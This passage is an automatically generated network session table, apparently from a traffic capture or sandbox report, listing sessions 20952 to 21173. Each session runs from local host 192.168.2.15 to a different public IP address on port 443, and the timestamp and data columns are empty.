                                            20952192.168.2.1543786180.165.29.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20953192.168.2.155845697.37.99.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20954192.168.2.155722479.207.72.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20955192.168.2.1539392209.252.147.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20956192.168.2.1560268217.77.50.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20957192.168.2.155651632.97.254.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20958192.168.2.1537098221.123.115.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20959192.168.2.1552260152.155.234.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20960192.168.2.1536418158.238.111.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20961192.168.2.1560026131.240.203.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20962192.168.2.15453622.54.238.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20963192.168.2.153385470.118.195.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20964192.168.2.15575728.251.211.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20965192.168.2.1544556106.50.51.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20966192.168.2.1550426156.134.184.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20967192.168.2.153710614.18.206.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20968192.168.2.155280682.97.224.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20969192.168.2.1559014129.253.117.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20970192.168.2.154312499.62.49.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20971192.168.2.1541532212.138.118.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20972192.168.2.154420497.98.11.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20973192.168.2.1556134111.46.195.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20974192.168.2.1558778143.208.85.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20975192.168.2.1548824165.9.16.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20976192.168.2.1548706219.225.138.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20977192.168.2.154061027.27.168.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20978192.168.2.15510302.118.175.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20979192.168.2.1556786212.98.191.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20980192.168.2.1545496151.112.113.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20981192.168.2.1533520128.100.204.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20982192.168.2.1533200118.106.2.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20983192.168.2.1550592121.120.240.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20984192.168.2.1538058134.6.39.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20985192.168.2.1542630101.238.3.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20986192.168.2.155025223.144.148.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20987192.168.2.155234289.69.32.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20988192.168.2.154651218.218.138.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20989192.168.2.1550072199.211.112.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20990192.168.2.155745427.79.37.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20991192.168.2.1557016196.124.139.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20992192.168.2.155857638.17.199.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20993192.168.2.155380881.7.33.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20994192.168.2.1558072196.18.59.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20995192.168.2.1541602128.61.237.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20996192.168.2.155064853.213.140.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20997192.168.2.155718687.162.215.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20998192.168.2.154961641.153.117.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20999192.168.2.1537340104.9.164.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21000192.168.2.1552934170.228.0.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21001192.168.2.1550516155.5.130.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21002192.168.2.154093223.49.122.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21003192.168.2.153492668.222.203.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21004192.168.2.1542302202.201.162.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21005192.168.2.1557134173.166.143.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21006192.168.2.153788292.102.23.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21007192.168.2.1535386219.178.238.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21008192.168.2.154898465.219.153.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21009192.168.2.1554582109.122.154.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21010192.168.2.1560286200.239.133.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21011192.168.2.1546950154.11.182.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21012192.168.2.1547558213.29.114.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21013192.168.2.1559526169.63.20.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21014192.168.2.154057053.143.26.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21015192.168.2.155102837.119.37.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21016192.168.2.1543868117.255.91.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21017192.168.2.155920054.188.190.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21018192.168.2.154118657.242.84.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21019192.168.2.1550648113.129.203.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21020192.168.2.1548974184.94.87.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21021192.168.2.1557788140.43.60.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21022192.168.2.153639668.78.173.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21023192.168.2.154365851.75.87.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21024192.168.2.1538244166.190.178.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21025192.168.2.1559404177.84.91.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21026192.168.2.1545954159.51.75.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21027192.168.2.15387008.52.83.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21028192.168.2.1532906207.96.94.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21029192.168.2.1547752148.52.45.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21030192.168.2.1553716147.158.209.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21031192.168.2.155913482.249.210.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21032192.168.2.153499096.39.162.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21033192.168.2.154642491.205.98.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21034192.168.2.153421465.222.156.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21035192.168.2.1543482115.52.205.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21036192.168.2.154568836.191.58.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21037192.168.2.1534958222.80.51.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21038192.168.2.1547026202.3.220.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21039192.168.2.1536354184.97.190.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21040192.168.2.153513448.181.1.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21041192.168.2.153571677.46.71.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21042192.168.2.1553234140.126.225.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21043192.168.2.15360221.88.110.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21044192.168.2.1558550117.99.208.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21045192.168.2.1554842151.124.91.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21046192.168.2.15586421.148.92.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21047192.168.2.153674259.252.202.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21048192.168.2.1535716138.188.161.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21049192.168.2.1542076144.58.191.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21050192.168.2.1551310196.229.136.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21051192.168.2.1557262161.144.203.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21052192.168.2.1556098132.125.132.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21053192.168.2.1543380152.239.64.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21054192.168.2.155402219.126.219.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21055192.168.2.1556268107.254.228.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21056192.168.2.1542770145.203.173.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21057192.168.2.1545038146.234.59.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21058192.168.2.153955448.240.228.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21059192.168.2.154523086.41.127.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21060192.168.2.1560560209.68.61.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21061192.168.2.15423508.204.240.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21062192.168.2.1560386120.137.5.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21063192.168.2.1552686181.172.255.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21064192.168.2.1547738123.181.43.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21065192.168.2.1556570148.129.239.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21066192.168.2.1538786194.59.86.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21067192.168.2.1557346126.194.142.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21068192.168.2.154814837.144.177.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21069192.168.2.1550880147.27.84.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21070192.168.2.1535348168.139.85.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21071192.168.2.1551528218.106.208.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21072192.168.2.1558008100.170.172.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21073192.168.2.1538042135.75.93.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21074192.168.2.155505886.121.27.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21075192.168.2.1534366202.45.133.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21076192.168.2.154116295.128.111.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21077192.168.2.1545194198.187.221.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21078192.168.2.1535598161.142.10.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21079192.168.2.155311875.32.76.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21080192.168.2.1534226209.105.25.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21081192.168.2.1553478111.183.146.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21082192.168.2.15559681.64.56.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21083192.168.2.1536690148.186.143.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21084192.168.2.155499091.97.108.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21085192.168.2.1537056184.73.80.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21086192.168.2.1551202157.89.189.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21087192.168.2.1550986186.152.81.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21088192.168.2.155073485.8.159.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21089192.168.2.153341684.114.99.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21090192.168.2.155237483.58.49.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21091192.168.2.15545669.76.28.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21092192.168.2.1554858139.153.107.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21093192.168.2.1545878108.41.38.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21094192.168.2.1540508133.12.29.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21095192.168.2.1547352154.171.92.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21096192.168.2.1553508150.164.25.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21097192.168.2.15374262.27.193.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21098192.168.2.1550330219.69.65.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21099192.168.2.1558838222.96.250.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21100192.168.2.1555508143.89.17.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21101192.168.2.1551708126.87.120.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21102192.168.2.1555322140.183.12.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21103192.168.2.1552764202.237.159.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21104192.168.2.155087412.189.76.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21105192.168.2.153616653.88.125.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21106192.168.2.1548194166.26.166.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21107192.168.2.1546878179.163.155.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21108192.168.2.153959890.221.31.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21109192.168.2.1537060173.194.218.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21110192.168.2.1560668218.214.42.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21111192.168.2.1552860104.97.20.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21112192.168.2.15413549.128.184.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21113192.168.2.1549210168.226.57.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21114192.168.2.1550786211.97.103.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21115192.168.2.1558544152.244.24.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21116192.168.2.1541762130.244.215.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21117192.168.2.1553340191.140.240.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21118192.168.2.154383896.229.150.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21119192.168.2.155076882.32.192.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21120192.168.2.1533470186.211.144.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21121192.168.2.155220278.53.106.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21122192.168.2.154206284.182.53.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21123192.168.2.1558252207.53.187.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21124192.168.2.153800277.42.249.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21125192.168.2.1558262108.226.60.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21126192.168.2.1548098147.25.9.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21127192.168.2.153798637.216.81.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21128192.168.2.155196846.111.103.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21129192.168.2.1549352172.191.205.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21130192.168.2.154404613.88.131.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21131192.168.2.1549876148.145.69.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21132192.168.2.155019048.102.235.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21133192.168.2.155991238.161.11.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21134192.168.2.155620440.228.102.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21135192.168.2.155213276.254.97.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21136192.168.2.155830013.106.98.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21137192.168.2.1559026212.137.48.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21138192.168.2.154636247.234.247.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21139192.168.2.1548328163.193.32.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21140192.168.2.1543620146.99.226.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21141192.168.2.1555068128.125.20.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21142192.168.2.1556856175.175.29.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21143192.168.2.153283490.176.31.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21144192.168.2.1541458194.160.42.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21145192.168.2.1544658141.69.133.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21146192.168.2.1535850173.61.244.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21147192.168.2.155693296.69.85.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21148192.168.2.1545138188.108.139.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21149192.168.2.1547902168.250.66.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21150192.168.2.1551418174.226.93.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21151192.168.2.1546032136.49.165.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21152192.168.2.155715649.122.212.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21153192.168.2.15499821.35.114.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21154192.168.2.154137889.224.205.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21155192.168.2.153281418.205.29.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21156192.168.2.1536606197.228.250.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21157192.168.2.154191058.75.106.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21158192.168.2.1539710196.122.252.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21159192.168.2.1543088144.177.233.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21160192.168.2.1553908212.153.24.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21161192.168.2.155524496.196.195.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21162192.168.2.155334259.176.211.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21163192.168.2.1558424105.181.236.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21164192.168.2.1558814149.203.152.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21165192.168.2.153827876.120.227.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21166192.168.2.153654658.215.244.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21167192.168.2.1555314104.169.105.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21168192.168.2.1552246186.2.138.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21169192.168.2.1541994151.31.189.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21170192.168.2.1535968131.230.214.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21171192.168.2.1541802140.251.219.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21172192.168.2.1542272160.52.56.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            21173192.168.2.155417894.16.134.243443
                                            TimestampBytes transferredDirectionData


